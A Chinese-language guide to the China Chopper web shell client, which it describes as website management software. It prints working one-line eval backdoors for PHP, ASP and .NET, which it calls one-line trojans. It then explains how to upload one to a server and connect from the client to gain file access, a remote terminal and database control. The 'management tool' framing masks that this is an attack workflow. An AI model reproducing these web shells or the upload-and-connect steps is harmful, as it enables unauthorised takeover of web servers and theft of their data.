中国菜刀

简介

中国菜刀，不是用来切菜做饭的道具，而是一款专业的网站管理软件，用途广泛，使用方便，小巧实用。只要支持动态脚本的网站，都可以用中国菜刀来进行管理！程序大小：214K，在非简体中文环境下使用，自动切换到英文界面。UINCODE方式编译，支持多国语言输入显示。

功能

只要支持动态脚本的网站，都可以用中国菜刀来进行管理！主要功能有：文件管理，虚拟终端，数据库管理。
UINCODE方式编译，支持多国语言输入显示。

EVAL客户端部分

要了解的

服务端只需要简单的一行代码，即可用此程序实现常用的管理功能。
支持的服务端脚本：PHP， ASP，.NET。
在服务端运行的代码如下：

PHP

EVAL客户端部分
要了解的
服务端只需要简单的一行代码，即可用此程序实现常用的管理功能。
支持的服务端脚本：PHP， ASP，.NET。
在服务端运行的代码如下：

PHP

<?php @eval($_POST['pass']);?>

ASP

<%eval request("pass")%>

.NET：

注意：.NET要单独一个文件或此文件也是Jscript语言

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

怎么用

在主视图中右键/添加，在弹出的对话框中输入服务端地址，连接的密码（请注意上例中的pass字串），选择正确的脚本类型和语言编码，保存后即可使用文件管理，虚拟终端，数据库管理三大块功能。要是其它都没错误，那么可能就是你把语言编码选错了。

1. 文件管理：[特色]缓存下载目录，并支持离线查看缓存目录；
2. 虚拟终端：[特色]人性化的设计，操作方便；（输入HELP查看更多用法）
3. 数据库管理：[特色]图形界面，支持MYSQL，MSSQL，ORACLE，INFOMIX，ACCESS
   以入支持ADO方式连接的数据库。

各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看。
注意：由于服务器的安全设置，某些功能可能不能正常使用。

使用

需要数据

一句话木马所在的URL（红框）

前期先通过上传一句话木马，此时才能通过菜刀连接。
需要知道一句话木马所在的URL，并且路径拥有可执行权限，才能设置连接：

http：//192.168.236.138：caidao.php

密码（橙框）

以ASP举例，当上传一句话木马的内容为：

<%eval request（"chopper"）%>

密码：

chopper

配置（黄框）

数据库-PHP脚本

<T>类型</T>：类型可为MYSQL，MSSQL，ORACLE，INFOMIX中的一种
<H>主机地址<H>：主机地址可为机器名或IP地址，如localhost
<U>数据库用户</U>：连接数据库的用户名，如root
<P>数据库密码</P>：连接数据库的密码，如123455

数据库-ASP和.NET脚本

<T>类型</T>：类型只能填ADO
<C>ADO配置信息</C>：ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
Driver={Sql Server}；Server=（local）；Database=master；Uid=sa；Pwd=123456

脚本类型（绿框）

目前支持的服务端脚本：PHP， ASP， ASP.NET，并且支持https安全连接的网站：

注意和上传的一句话木马语言保持一致，不要上传的是PHP的一句话木马，但是连接设置却选了ASP。